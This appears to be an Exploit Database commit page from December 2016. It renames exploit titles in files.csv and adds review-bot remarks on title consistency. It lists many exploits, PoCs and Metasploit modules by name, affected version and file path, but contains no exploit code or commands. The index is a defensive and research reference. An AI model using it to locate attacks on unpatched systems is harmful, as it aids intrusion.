DB: 2016-12-03

1 new exploits

PHP - wddx_deserialize() String Append Crash
PHP 5 - wddx_deserialize() String Append Crash

PHP - 'PHP_gd2.dll' imagepsloadfont Local Buffer Overflow (PoC)
PHP 5.2.3 - 'PHP_gd2.dll' imagepsloadfont Local Buffer Overflow (PoC)

Samba 3.0.27a - send_mailslot() Remote Buffer Overflow
Samba 3.0.27a - 'send_mailslot()' Remote Buffer Overflow
PHP 5.2.6 - sleep() Local Memory Exhaust Exploit
CA Internet Security Suite 2008 - SaveToFile()File Corruption (PoC)
PHP 5.2.6 - 'sleep()' Local Memory Exhaust Exploit
CA Internet Security Suite 2008 - 'SaveToFile()' File Corruption (PoC)
freeSSHd 1.2.1 - Remote Stack Overflow PoC Authenticated
Samba (client) - receive_smb_raw() Buffer Overflow (PoC)
FreeSSHd 1.2.1 - Remote Stack Overflow PoC Authenticated
Samba 3.0.29 (client) - 'receive_smb_raw()' Buffer Overflow (PoC)

freeSSHd 1.2.1 - Authenticated SFTP rename Remote Buffer Overflow PoC
FreeSSHd 1.2.1 - Authenticated SFTP rename Remote Buffer Overflow (PoC)

freeSSHd 1.2.1 - Authenticated SFTP realpath Remote Buffer Overflow PoC
FreeSSHd 1.2.1 - Authenticated SFTP realpath Remote Buffer Overflow (PoC)

FreeSSHD 1.2.4 - Remote Buffer Overflow Denial of Service
FreeSSHd 1.2.4 - Denial of Service

Samba - Multiple Denial of Service Vulnerabilities
Samba 3.4.7/3.5.1 - Denial of Service

FreeSSHd - Crash (PoC)
FreeSSHd - Denial of Service (PoC)

PHP - Hashtables Denial of Service
PHP 5.3.8 - Hashtables Denial of Service

freeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Packet Remote Denial of Service
FreeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Packet Remote Denial of Service

freeSSHd 1.3.1 - Denial of Service
FreeSSHd 1.3.1 - Denial of Service

PHP - SplDoublyLinkedList Unserialize() Use-After-Free
PHP 5.4/5.5/5.6 - SplDoublyLinkedList Unserialize() Use-After-Free

PHP - SplObjectStorage Unserialize() Use-After-Free
PHP 5.4/5.5/5.6 - SplObjectStorage Unserialize() Use-After-Free

PHP - Unserialize() Use-After-Free Vulnerabilities
PHP 5.4/5.5/5.6 - Unserialize() Use-After-Free Vulnerabilities

PHP - 'ini_restore()' Memory Information Disclosure
PHP 5.2.10/5.3.0 - 'ini_restore()' Memory Information Disclosure

Linux Kernel < 3.4.5 (ARM Android 4.2.2 / 4.4) - Privilege Escalation
Linux Kernel < 3.4.5 (Android 4.2.2 / 4.4 ARM) - Privilege Escalation

Linux Kernel 3.13 - Privilege Escalation PoC (gid)
Linux Kernel 3.13 - Privilege Escalation PoC (SGID)

freeSSHd 1.0.9 - Key Exchange Algorithm Buffer Overflow
FreeSSHd 1.0.9 - Key Exchange Algorithm Buffer Overflow

freeSSHd 1.2.1 - Authenticated Remote SEH Overflow
FreeSSHd 1.2.1 - Authenticated Remote SEH Overflow

FreeSSHd 1.2.1 - (rename) Remote Buffer Overflow (SEH)
FreeSSHd 1.2.1 - 'rename' Command Remote Buffer Overflow (SEH)
Samba (Solaris) - lsa_io_trans_names Heap Overflow (Metasploit)
Samba (Solaris SPARC) - trans2open Overflow (Metasploit)
Samba 3.0.24 (Solaris) - 'lsa_io_trans_names' Heap Overflow (Metasploit)
Samba 2.2.8 (Solaris SPARC) - 'trans2open' Overflow (Metasploit)

freeSSHd 1.0.9 - Key Exchange Algorithm String Buffer Overflow (Metasploit)
FreeSSHd 1.0.9 - Key Exchange Algorithm String Buffer Overflow (Metasploit)
Samba (Linux) - lsa_io_trans_names Heap Overflow (Metasploit)
Samba (Linux/x86) - chain_reply Memory Corruption (Metasploit)
Samba (Linux x86) - trans2open Overflow (Metasploit)
Samba 3.0.24 (Linux) - 'lsa_io_trans_names' Heap Overflow (Metasploit)
Samba 3.3.12 (Linux/x86) - 'chain_reply' Memory Corruption (Metasploit)
Samba 2.2.8 (Linux x86) - 'trans2open' Overflow (Metasploit)
Samba (OSX) - lsa_io_trans_names Heap Overflow (Metasploit)
Samba (OSX/PPC) - trans2open Overflow (Metasploit)
Samba 3.0.10 (OSX) - 'lsa_io_trans_names' Heap Overflow (Metasploit)
Samba 2.2.8 (OSX/PPC) - 'trans2open' Overflow (Metasploit)

Samba (*BSD x86) - trans2open Overflow Exploit (Metasploit)
Samba 2.2.8 (*BSD x86) - 'trans2open' Overflow Exploit (Metasploit)

PHP - CGI Argument Injection (Metasploit)
PHP 5.3.12/5.4.2 - CGI Argument Injection (Metasploit)

PHP - apache_request_headers Function Buffer Overflow (Metasploit)
PHP 5.4.3 - apache_request_headers Function Buffer Overflow (Metasploit)

Samba - SetInformationPolicy AuditEventsInfo Heap Overflow (Metasploit)
Samba 3.4.16/3.5.14/3.6.4 - SetInformationPolicy AuditEventsInfo Heap Overflow (Metasploit)

FreeSSHD 2.1.3 - Remote Authentication Bypass
FreeSSHd 2.1.3 - Remote Authentication Bypass

FreeSSHD - Authentication Bypass (Metasploit)
FreeSSHd 1.2.6 - Authentication Bypass (Metasploit)

HP LoadRunner - magentproc.exe Overflow (Metasploit)
HP LoadRunner - 'magentproc.exe' Overflow (Metasploit)

PHP - 'header()' HTTP Header Injection
PHP 5.3.11/5.4.0RC2 - 'header()' HTTP Header Injection
VX Search Enterprise 9.0.26 - Buffer Overflow
Sync Breeze Enterprise 8.9.24 - Buffer Overflow
Dup Scout Enterprise 9.0.28 - Buffer Overflow
Disk Sorter Enterprise 9.0.24 - Buffer Overflow
Disk Savvy Enterprise 9.0.32 - Buffer Overflow
VX Search Enterprise 9.0.26 - 'Login' Buffer Overflow
Sync Breeze Enterprise 8.9.24 - 'Login' Buffer Overflow
Dup Scout Enterprise 9.0.28 - 'Login' Buffer Overflow
Disk Sorter Enterprise 9.0.24 - 'Login' Buffer Overflow
Disk Savvy Enterprise 9.0.32 - 'Login' Buffer Overflow
VX Search Enterprise 9.1.12 - Buffer Overflow
Sync Breeze Enterprise 9.1.16 - Buffer Overflow
Disk Sorter Enterprise 9.1.12 - Buffer Overflow
Dup Scout Enterprise 9.1.14 - Buffer Overflow
Disk Savvy Enterprise 9.1.14 - Buffer Overflow
Disk Pulse Enterprise 9.1.16 - Buffer Overflow
VX Search Enterprise 9.1.12 - 'Login' Buffer Overflow
Sync Breeze Enterprise 9.1.16 - 'Login' Buffer Overflow
Disk Sorter Enterprise 9.1.12 - 'Login' Buffer Overflow
Dup Scout Enterprise 9.1.14 - 'Login' Buffer Overflow
Disk Savvy Enterprise 9.1.14 - 'Login' Buffer Overflow
Disk Pulse Enterprise 9.1.16 - 'Login' Buffer Overflow
Disk Savvy Enterprise 9.1.14 - 'GET' Buffer Overflow

PHP - (php-exec-dir) Patch Command Access Restriction Bypass
PHP 4.3.7 - (php-exec-dir) Patch Command Access Restriction Bypass

phNNTP 1.3 - (article-raw.php) Remote File Inclusion
phNNTP 1.3 - 'article-raw.php' Remote File Inclusion

Travelsized CMS 0.4 - (FrontPage.php) Remote File Inclusion
Travelsized CMS 0.4 - 'FrontPage.php' Remote File Inclusion

Uberghey 0.3.1 - (FrontPage.php) Remote File Inclusion
Uberghey 0.3.1 - 'FrontPage.php' Remote File Inclusion

BP Blog 7.0 - (default.asp layout) SQL Injection
BP Blog 7.0 - 'layout' Parameter SQL Injection
Joomla! Component Artist (idgalery) - SQL Injection
FlashBlog - (articulo_id) SQL Injection
Joomla! Component Artist - 'idgalery' Parameter SQL Injection
FlashBlog - 'articulo_id' Parameter SQL Injection

AirvaeCommerce 3.0 - 'pid' SQL Injection
AirvaeCommerce 3.0 - 'pid' Parameter SQL Injection

CMS from Scratch 1.1.3 - (image.php) Directory Traversal
CMS from Scratch 1.1.3 - 'image.php' Directory Traversal

HiveMaker Professional 1.0.2 - 'cid' SQL Injection
HiveMaker Professional 1.0.2 - 'cid' Parameter SQL Injection

Social Site Generator - (sgc_id) SQL Injection
Social Site Generator 2.0 - 'sgc_id' Parameter SQL Injection
PHP Visit Counter 0.4 - (datespan) SQL Injection
PassWiki 0.9.16 RC3 - (site_id) Local File Inclusion
BP Blog 6.0 - 'id' Blind SQL Injection
EasyWay CMS - 'index.php mid' SQL Injection
Social Site Generator - (path) Remote File Inclusion
Joomla! Component prayercenter 1.4.9 - 'id' SQL Injection
Joomla! Component com_biblestudy 1.5.0 - 'id' SQL Injection
PHP Visit Counter 0.4 - 'datespan' Parameter SQL Injection
PassWiki 0.9.16 RC3 - 'site_id' Parameter Local File Inclusion
BP Blog 6.0 - 'id' Parameter Blind SQL Injection
EasyWay CMS - 'mid' Parameter SQL Injection
Social Site Generator 2.0 - 'path' Parameter Remote File Inclusion
Joomla! Component prayercenter 1.4.9 - 'id' Parameter SQL Injection
Joomla! Component Bible Study 1.5.0 - 'id' Parameter SQL Injection

HiveMaker Directory - 'index.php cid' SQL Injection
HiveMaker Directory - 'cid' Parameter SQL Injection

Goople 1.8.2 - (FrontPage.php) Blind SQL Injection
Goople 1.8.2 - 'FrontPage.php' Blind SQL Injection

PsychoStats 3.2.2b - (awards.php id Parameter) Blind SQL Injection
PsychoStats 3.2.2b - 'awards.php' Blind SQL Injection

PsychoStats 2.x - Login Parameter Cross-Site Scripting

PsychoStats 2.3 - Server.php Full Path Disclosure
PsychoStats 2.3 - 'Server.php' Full Path Disclosure

PsychoStats 3.0.6b - Multiple Scripts Multiple Cross-Site Scripting Vulnerabilities

PHP - cgimode fpm writeprocmemfile Bypass disable function demo
PHP 5.5.9 - cgimode fpm writeprocmemfile Bypass disable function

CMSimple - /2author/index.php color Parameter Remote Code Execution
CMSimple 4.4.4 - 'color' Parameter Remote Code Execution
Offensive Security 2016-12-03 05:01:19 +00:00
parent 42018b3d96
commit 4b3da08aa9
4 changed files with 152 additions and 97 deletions

files.csv

@ -514,7 +514,7 @@ id,file,description,date,author,platform,type,port
3394,platforms/multiple/dos/3394.php,"PHP 4 - Userland ZVAL Reference Counter Overflow (PoC)",2007-03-01,"Stefan Esser",multiple,dos,0
3396,platforms/linux/dos/3396.php,"PHP 4.4.4 - Unserialize() ZVAL Reference Counter Overflow (PoC)",2007-03-02,"Stefan Esser",linux,dos,0
3399,platforms/windows/dos/3399.txt,"Netrek 2.12.0 - pmessage2() Remote Limited Format String",2007-03-02,"Luigi Auriemma",windows,dos,0
3404,platforms/multiple/dos/3404.php,"PHP - wddx_deserialize() String Append Crash",2007-03-04,"Stefan Esser",multiple,dos,0
3404,platforms/multiple/dos/3404.php,"PHP 5 - wddx_deserialize() String Append Crash",2007-03-04,"Stefan Esser",multiple,dos,0
3407,platforms/multiple/dos/3407.c,"Asterisk 1.2.15 / 1.4.0 - Unauthenticated Remote Denial of Service",2007-03-04,fbffff,multiple,dos,0
3415,platforms/linux/dos/3415.html,"Konqueror 3.5.5 - (JavaScript Read of FTP Iframe) Denial of Service",2007-03-05,mark,linux,dos,0
3418,platforms/windows/dos/3418.pl,"Mercury/32 Mail Server 4.01b - (check) Buffer Overflow (PoC)",2007-03-06,mu-b,windows,dos,0
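Review bot: In the 3404 row the new title still leaves wddx_deserialize() unquoted, while other renames in this commit wrap function names in single quotes ('send_mailslot()', 'sleep()'). Suggest `PHP 5 - 'wddx_deserialize()' String Append Crash` so the row follows the same convention.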
@ -613,7 +613,7 @@ id,file,description,date,author,platform,type,port
4205,platforms/windows/dos/4205.pl,"TeamSpeak 2.0 - (Windows Release) Remote Denial of Service",2007-07-20,"YAG KOHHA",windows,dos,0
4215,platforms/windows/dos/4215.pl,"Microsoft Windows - explorer.exe Gif Image Denial of Service",2007-07-23,DeltahackingTEAM,windows,dos,0
4216,platforms/linux/dos/4216.pl,"Xserver 0.1 Alpha - Post Request Remote Buffer Overflow",2007-07-23,deusconstruct,linux,dos,0
4227,platforms/windows/dos/4227.php,"PHP - 'PHP_gd2.dll' imagepsloadfont Local Buffer Overflow (PoC)",2007-07-26,r0ut3r,windows,dos,0
4227,platforms/windows/dos/4227.php,"PHP 5.2.3 - 'PHP_gd2.dll' imagepsloadfont Local Buffer Overflow (PoC)",2007-07-26,r0ut3r,windows,dos,0
4249,platforms/multiple/dos/4249.rb,"Asterisk < 1.2.22 / 1.4.8 IAX2 channel driver - Remote Crash",2007-07-31,tenkei_ev,multiple,dos,0
4251,platforms/windows/dos/4251.html,"Microsoft Internet Explorer 6 - DirectX Media Remote Overflow Denial of Service",2007-07-31,DeltahackingTEAM,windows,dos,0
4260,platforms/multiple/dos/4260.php,"PHP mSQL (msql_connect) - Local Buffer Overflow (PoC)",2007-08-06,NetJackal,multiple,dos,0
@ -667,7 +667,7 @@ id,file,description,date,author,platform,type,port
4716,platforms/windows/dos/4716.html,"Online Media Technologies 'AVSMJPEGFILE.DLL 1.1' - Remote Buffer Overflow (PoC)",2007-12-11,shinnai,windows,dos,0
4717,platforms/windows/dos/4717.py,"Simple HTTPD 1.41 - (/aux) Remote Denial of Service",2007-12-11,shinnai,windows,dos,0
4723,platforms/osx/dos/4723.c,"Apple Mac OSX xnu 1228.0 - super_blob Local kernel Denial of Service (PoC)",2007-12-12,mu-b,osx,dos,0
4732,platforms/linux/dos/4732.c,"Samba 3.0.27a - send_mailslot() Remote Buffer Overflow",2007-12-14,x86,linux,dos,0
4732,platforms/linux/dos/4732.c,"Samba 3.0.27a - 'send_mailslot()' Remote Buffer Overflow",2007-12-14,x86,linux,dos,0
4742,platforms/windows/dos/4742.py,"WFTPD Explorer Pro 1.0 - Remote Heap Overflow (PoC)",2007-12-18,r4x,windows,dos,0
4748,platforms/windows/dos/4748.php,"Surgemail 38k4 - webmail Host header Denial of Service",2007-12-18,rgod,windows,dos,0
4757,platforms/windows/dos/4757.txt,"HP Software Update Client 3.0.8.4 - Multiple Vulnerabilities",2007-12-19,porkythepig,windows,dos,0
@ -731,11 +731,11 @@ id,file,description,date,author,platform,type,port
5547,platforms/windows/dos/5547.txt,"Novell eDirectory < 8.7.3 SP 10 / 8.8.2 - HTTP headers Denial of Service",2008-05-05,Nicob,windows,dos,0
5561,platforms/linux/dos/5561.pl,"rdesktop 1.5.0 - 'iso_recv_msg()' Integer Underflow (PoC)",2008-05-08,"Guido Landi",linux,dos,0
5585,platforms/linux/dos/5585.pl,"rdesktop 1.5.0 - 'process_redirect_pdu()' BSS Overflow (PoC)",2008-05-11,"Guido Landi",linux,dos,0
5679,platforms/multiple/dos/5679.php,"PHP 5.2.6 - sleep() Local Memory Exhaust Exploit",2008-05-27,Gogulas,multiple,dos,0
5682,platforms/windows/dos/5682.html,"CA Internet Security Suite 2008 - SaveToFile()File Corruption (PoC)",2008-05-28,Nine:Situations:Group,windows,dos,0
5679,platforms/multiple/dos/5679.php,"PHP 5.2.6 - 'sleep()' Local Memory Exhaust Exploit",2008-05-27,Gogulas,multiple,dos,0
5682,platforms/windows/dos/5682.html,"CA Internet Security Suite 2008 - 'SaveToFile()' File Corruption (PoC)",2008-05-28,Nine:Situations:Group,windows,dos,0
5687,platforms/windows/dos/5687.txt,"Adobe Acrobat Reader 8.1.2 - Malformed PDF Remote Denial of Service (PoC)",2008-05-29,securfrog,windows,dos,0
5709,platforms/windows/dos/5709.pl,"freeSSHd 1.2.1 - Remote Stack Overflow PoC Authenticated",2008-05-31,securfrog,windows,dos,0
5712,platforms/multiple/dos/5712.pl,"Samba (client) - receive_smb_raw() Buffer Overflow (PoC)",2008-06-01,"Guido Landi",multiple,dos,0
5709,platforms/windows/dos/5709.pl,"FreeSSHd 1.2.1 - Remote Stack Overflow PoC Authenticated",2008-05-31,securfrog,windows,dos,0
5712,platforms/multiple/dos/5712.pl,"Samba 3.0.29 (client) - 'receive_smb_raw()' Buffer Overflow (PoC)",2008-06-01,"Guido Landi",multiple,dos,0
5718,platforms/windows/dos/5718.pl,"Alt-N SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (PoC)",2008-06-01,securfrog,windows,dos,0
5727,platforms/windows/dos/5727.pl,"MDaemon 9.6.5 - Multiple Remote Buffer Overflow (PoC)",2008-06-02,securfrog,windows,dos,0
5749,platforms/multiple/dos/5749.pl,"Asterisk - (SIP channel driver / in pedantic mode) Remote Crash",2008-06-05,"Armando Oliveira",multiple,dos,0
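Review bot: The new 5709 title ends in "Remote Stack Overflow PoC Authenticated", leaving PoC bare and Authenticated trailing, whereas rows 6800 and 6812 in this commit put Authenticated first and close with a parenthesized (PoC). Suggest `FreeSSHd 1.2.1 - Authenticated Remote Stack Overflow (PoC)` to match.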
@ -835,9 +835,9 @@ id,file,description,date,author,platform,type,port
6756,platforms/windows/dos/6756.txt,"VideoLAN VLC Media Player 0.9.2 Media Player - XSPF Memory Corruption",2008-10-14,"Core Security",windows,dos,0
6761,platforms/windows/dos/6761.html,"Hummingbird 13.0 - ActiveX Remote Buffer Overflow (PoC)",2008-10-16,"Thomas Pollet",windows,dos,0
6775,platforms/solaris/dos/6775.c,"Solaris 9 PortBind - XDR-DECODE taddr2uaddr() Remote Denial of Service",2008-10-17,"Federico L. Bossi Bonin",solaris,dos,0
6800,platforms/windows/dos/6800.pl,"freeSSHd 1.2.1 - Authenticated SFTP rename Remote Buffer Overflow PoC",2008-10-22,"Jeremy Brown",windows,dos,0
6800,platforms/windows/dos/6800.pl,"FreeSSHd 1.2.1 - Authenticated SFTP rename Remote Buffer Overflow (PoC)",2008-10-22,"Jeremy Brown",windows,dos,0
6805,platforms/multiple/dos/6805.txt,"LibSPF2 < 1.2.8 - DNS TXT Record Parsing Bug Heap Overflow (PoC)",2008-10-22,"Dan Kaminsky",multiple,dos,0
6812,platforms/windows/dos/6812.pl,"freeSSHd 1.2.1 - Authenticated SFTP realpath Remote Buffer Overflow PoC",2008-10-22,"Jeremy Brown",windows,dos,0
6812,platforms/windows/dos/6812.pl,"FreeSSHd 1.2.1 - Authenticated SFTP realpath Remote Buffer Overflow (PoC)",2008-10-22,"Jeremy Brown",windows,dos,0
6815,platforms/windows/dos/6815.pl,"SilverSHielD 1.0.2.34 - (opendir) Denial of Service",2008-10-23,"Jeremy Brown",windows,dos,0
6824,platforms/windows/dos/6824.txt,"Microsoft Windows Server - Code Execution (PoC) (MS08-067)",2008-10-23,"stephen lawler",windows,dos,0
6832,platforms/windows/dos/6832.html,"KVIrc 3.4.0 - Virgo Remote Format String (PoC)",2008-10-24,LiquidWorm,windows,dos,0
@ -1440,7 +1440,7 @@ id,file,description,date,author,platform,type,port
11827,platforms/windows/dos/11827.py,"no$gba 2.5c - '.nds' Local crash",2010-03-21,l3D,windows,dos,0
11838,platforms/windows/dos/11838.php,"Apple Safari 4.0.5 - (object tag) 'JavaScriptCore.dll' Denial of Service (Crash)",2010-03-22,3lkt3F0k4,windows,dos,0
11839,platforms/windows/dos/11839.py,"Donar Player 2.2.0 - Local Crash (PoC)",2010-03-22,b0telh0,windows,dos,0
11842,platforms/windows/dos/11842.py,"FreeSSHD 1.2.4 - Remote Buffer Overflow Denial of Service",2010-03-22,Pi3rrot,windows,dos,0
11842,platforms/windows/dos/11842.py,"FreeSSHd 1.2.4 - Denial of Service",2010-03-22,Pi3rrot,windows,dos,0
11855,platforms/multiple/dos/11855.c,"Jinais IRC Server 0.1.8 - Null Pointer (PoC)",2010-03-23,"Salvatore Fresta",multiple,dos,0
11861,platforms/windows/dos/11861.pl,"Smart PC Recorder 4.8 - '.mp3' Local Crash (PoC)",2010-03-24,chap0,windows,dos,0
11878,platforms/windows/dos/11878.py,"Cisco TFTP Server 1.1 - Denial of Service",2010-03-25,_SuBz3r0_,windows,dos,69
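Review bot: The 11842 rename drops "Remote Buffer Overflow" from the description, so the row now states only the impact and no longer names the bug class. If the crash is caused by an overflow, keep both, for example `FreeSSHd 1.2.4 - Remote Buffer Overflow (Denial of Service)`; if the overflow wording was inaccurate, record that reason alongside the change.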
@ -1541,7 +1541,7 @@ id,file,description,date,author,platform,type,port
12555,platforms/multiple/dos/12555.txt,"Pargoon CMS - Denial of Service",2010-05-10,"Pouya Daneshmand",multiple,dos,0
12564,platforms/windows/dos/12564.txt,"Microsoft Windows Outlook Express and Windows Mail - Integer Overflow",2010-05-11,"Francis Provencher",windows,dos,0
12578,platforms/windows/dos/12578.c,"Adobe Shockwave Player 11.5.6.606 - (DIR) Multiple Memory Vulnerabilities",2010-05-12,LiquidWorm,windows,dos,0
12588,platforms/linux/dos/12588.txt,"Samba - Multiple Denial of Service Vulnerabilities",2010-05-13,"laurent gaffie",linux,dos,0
12588,platforms/linux/dos/12588.txt,"Samba 3.4.7/3.5.1 - Denial of Service",2010-05-13,"laurent gaffie",linux,dos,0
12602,platforms/windows/dos/12602.txt,"Mozilla Firefox 3.6.3 / Safari 4.0.5 - Access Violation Exception and Unknown Exception",2010-05-14,"Fredrik Nordberg Almroth",windows,dos,0
12603,platforms/windows/dos/12603.py,"SmallFTPd 1.0.3 - 'DELE' Denial of Service",2010-05-14,"Jeremiah Talamantes",windows,dos,0
12604,platforms/windows/dos/12604.py,"TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service (1)",2010-05-14,"Jeremiah Talamantes",windows,dos,0
@ -2089,7 +2089,7 @@ id,file,description,date,author,platform,type,port
18257,platforms/windows/dos/18257.txt,"IrfanView - '.tiff' Image Processing Buffer Overflow",2011-12-20,"Francis Provencher",windows,dos,0
18254,platforms/windows/dos/18254.pl,"Free Mp3 Player 1.0 - Local Denial of Service",2011-12-19,JaMbA,windows,dos,0
18256,platforms/windows/dos/18256.txt,"IrfanView FlashPix PlugIn - Double-Free",2011-12-20,"Francis Provencher",windows,dos,0
18268,platforms/windows/dos/18268.txt,"FreeSSHd - Crash (PoC)",2011-12-24,Level,windows,dos,0
18268,platforms/windows/dos/18268.txt,"FreeSSHd - Denial of Service (PoC)",2011-12-24,Level,windows,dos,0
18269,platforms/windows/dos/18269.py,"MySQL 5.5.8 - Remote Denial of Service",2011-12-24,Level,windows,dos,0
18270,platforms/windows/dos/18270.py,"Putty 0.60 - Crash (PoC)",2011-12-24,Level,windows,dos,0
18271,platforms/windows/dos/18271.py,"Microsoft Windows Media Player 11.0.5721.5262 - Remote Denial of Service",2011-12-24,Level,windows,dos,0
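Review bot: Row 18268 changes "Crash (PoC)" to "Denial of Service (PoC)" but still carries no version, and the adjacent 18270 row (`Putty 0.60 - Crash (PoC)`, same author and date) keeps the old wording. Add the affected FreeSSHd version as done for the other FreeSSHd rows in this commit, and apply the same Crash to Denial of Service wording to 18270 so the two rows stay consistent.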
@ -2098,7 +2098,7 @@ id,file,description,date,author,platform,type,port
18278,platforms/linux/dos/18278.txt,"Nagios Plugins check_ups - Local Buffer Overflow (PoC)",2011-12-26,"Stefan Schurtz",linux,dos,0
18285,platforms/windows/dos/18285.py,"VideoLAN VLC Media Player 1.1.11 - (libav) 'libavcodec_plugin.dll' Denial of Service",2011-12-28,"Mitchell Adair",windows,dos,0
18295,platforms/linux/dos/18295.txt,"lighttpd - Denial of Service (PoC)",2011-12-31,pi3,linux,dos,0
18296,platforms/php/dos/18296.txt,"PHP - Hashtables Denial of Service",2012-01-01,infodox,php,dos,0
18296,platforms/php/dos/18296.txt,"PHP 5.3.8 - Hashtables Denial of Service",2012-01-01,infodox,php,dos,0
19024,platforms/windows/dos/19024.pl,"ComSndFTP Server 1.3.7 Beta - Remote Format String Overflow",2012-06-08,demonalex,windows,dos,0
18305,platforms/php/dos/18305.py,"PHP Hash Table Collision - (PoC)",2012-01-03,"Christian Mehlmauer",php,dos,0
18309,platforms/windows/dos/18309.pl,"VideoLAN VLC Media Player 1.1.11 - '.amr' Denial of Service (PoC)",2012-01-04,Fabi@habsec,windows,dos,0
@ -3930,7 +3930,7 @@ id,file,description,date,author,platform,type,port
31271,platforms/multiple/dos/31271.txt,"Sybase MobiLink 10.0.1.3629 - Multiple Heap Buffer Overflow Vulnerabilities",2008-02-20,"Luigi Auriemma",multiple,dos,0
31203,platforms/multiple/dos/31203.txt,"Mozilla Firefox 2.0.0.12 - IFrame Recursion Remote Denial of Service",2008-02-15,"Carl Hardwick",multiple,dos,0
31205,platforms/windows/dos/31205.txt,"Sami FTP Server 2.0.x - Multiple Commands Remote Denial of Service Vulnerabilities",2008-02-15,Cod3rZ,windows,dos,0
31218,platforms/linux/dos/31218.txt,"freeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Packet Remote Denial of Service",2008-02-17,"Luigi Auriemma",linux,dos,0
31218,platforms/linux/dos/31218.txt,"FreeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Packet Remote Denial of Service",2008-02-17,"Luigi Auriemma",linux,dos,0
31220,platforms/linux/dos/31220.py,"MP3Info 0.8.5a - Buffer Overflow",2014-01-27,jsacco,linux,dos,0
31222,platforms/windows/dos/31222.py,"Oracle Outside In MDB - File Parsing Stack Based Buffer Overflow (PoC)",2014-01-27,Citadelo,windows,dos,0
31223,platforms/multiple/dos/31223.txt,"Mozilla Thunderbird 17.0.6 - Input Validation Filter Bypass",2014-01-27,Vulnerability-Lab,multiple,dos,0
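Review bot: Row 31218 keeps the path platforms/linux/dos/31218.txt and platform `linux`, while every other FreeSSHd row touched in this commit is filed under `windows`. Since the title is being normalized here, check the platform column and file path for this entry and correct them in the same change or a follow-up.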
@ -4609,7 +4609,7 @@ id,file,description,date,author,platform,type,port
37776,platforms/windows/dos/37776.py,"Ability FTP Server 2.1.4 - Admin Panel AUTHCODE Command Remote Denial of Service",2015-08-15,St0rn,windows,dos,0
37777,platforms/linux/dos/37777.txt,"NetKit FTP Client (Ubuntu 14.04) - Crash/Denial of Service (PoC)",2015-08-15,"TUNISIAN CYBER",linux,dos,0
37783,platforms/linux/dos/37783.c,"GNU glibc - 'strcoll()' Routine Integer Overflow",2012-09-07,"Jan iankko Lieskovsky",linux,dos,0
38001,platforms/windows/dos/38001.py,"freeSSHd 1.3.1 - Denial of Service",2015-08-28,3unnym00n,windows,dos,22
38001,platforms/windows/dos/38001.py,"FreeSSHd 1.3.1 - Denial of Service",2015-08-28,3unnym00n,windows,dos,22
37798,platforms/windows/dos/37798.py,"XMPlay 3.8.1.12 - '.pls' Local Crash (PoC)",2015-08-17,St0rn,windows,dos,0
37810,platforms/windows/dos/37810.txt,"FTP Commander 8.02 - Overwrite (SEH)",2015-08-18,Un_N0n,windows,dos,0
37839,platforms/linux/dos/37839.txt,"Flash - PCRE Regex Compilation Zero-Length Assertion Arbitrary Bytecode Execution",2015-08-19,"Google Security Research",linux,dos,0
@ -4699,11 +4699,11 @@ id,file,description,date,author,platform,type,port
38072,platforms/windows/dos/38072.py,"SphereFTP Server 2.0 - Crash (PoC)",2015-09-02,"Meisam Monsef",windows,dos,21
38085,platforms/win_x86-64/dos/38085.pl,"ActiveState Perl.exe x64 Client 5.20.2 - Crash (PoC)",2015-09-06,"Robbie Corley",win_x86-64,dos,0
38108,platforms/windows/dos/38108.txt,"Advantech Webaccess 8.0 / 3.4.3 ActiveX - Multiple Vulnerabilities",2015-09-08,"Praveen Darshanam",windows,dos,0
38120,platforms/php/dos/38120.txt,"PHP - SplDoublyLinkedList Unserialize() Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0
38120,platforms/php/dos/38120.txt,"PHP 5.4/5.5/5.6 - SplDoublyLinkedList Unserialize() Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0
38121,platforms/php/dos/38121.txt,"PHP GMP unserialize() - Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0
38122,platforms/php/dos/38122.txt,"PHP - SplObjectStorage Unserialize() Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0
38122,platforms/php/dos/38122.txt,"PHP 5.4/5.5/5.6 - SplObjectStorage Unserialize() Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0
38123,platforms/php/dos/38123.txt,"PHP Session Deserializer - Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0
38125,platforms/php/dos/38125.txt,"PHP - Unserialize() Use-After-Free Vulnerabilities",2015-09-09,"Taoguang Chen",php,dos,0
38125,platforms/php/dos/38125.txt,"PHP 5.4/5.5/5.6 - Unserialize() Use-After-Free Vulnerabilities",2015-09-09,"Taoguang Chen",php,dos,0
38132,platforms/linux/dos/38132.py,"Linux Kernel 3.3.5 - Btrfs CRC32C feature Infinite Loop Local Denial of Service",2012-12-13,"Pascal Junod",linux,dos,0
38145,platforms/linux/dos/38145.txt,"OpenLDAP 2.4.42 - ber_get_next Denial of Service",2015-09-11,"Denis Andzakovic",linux,dos,389
38146,platforms/windows/dos/38146.html,"Microsoft Internet Explorer 11 - Stack Underflow Crash (PoC)",2015-09-11,Mjx,windows,dos,0
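Review bot: The "PHP 5.4/5.5/5.6" prefix is added to 38120, 38122 and 38125 but not to 38121 (`PHP GMP unserialize() - Use-After-Free`) or 38123 (`PHP Session Deserializer - Use-After-Free`), which share the author and date. Those two rows also place the component before the dash; if the same versions apply, bring them to the same "PHP <version> - <component> Use-After-Free" shape.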
@ -6224,7 +6224,7 @@ id,file,description,date,author,platform,type,port
10280,platforms/windows/local/10280.py,"AIMP2 Audio Converter 2.53 build 330 - Playlist '.pls' Unicode Buffer Overflow",2009-11-21,mr_me,windows,local,0
10281,platforms/windows/local/10281.php,"Adobe Illustrator CS4 14.0.0 - Encapsulated Postscript (.eps) Buffer Overflow",2009-12-03,pyrokinesis,windows,local,0
10295,platforms/windows/local/10295.txt,"DAZ Studio - Arbitrary Command Execution",2009-12-03,"Core Security",windows,local,0
10296,platforms/php/local/10296.txt,"PHP - 'ini_restore()' Memory Information Disclosure",2009-12-03,"Maksymilian Arciemowicz",php,local,0
10296,platforms/php/local/10296.txt,"PHP 5.2.10/5.3.0 - 'ini_restore()' Memory Information Disclosure",2009-12-03,"Maksymilian Arciemowicz",php,local,0
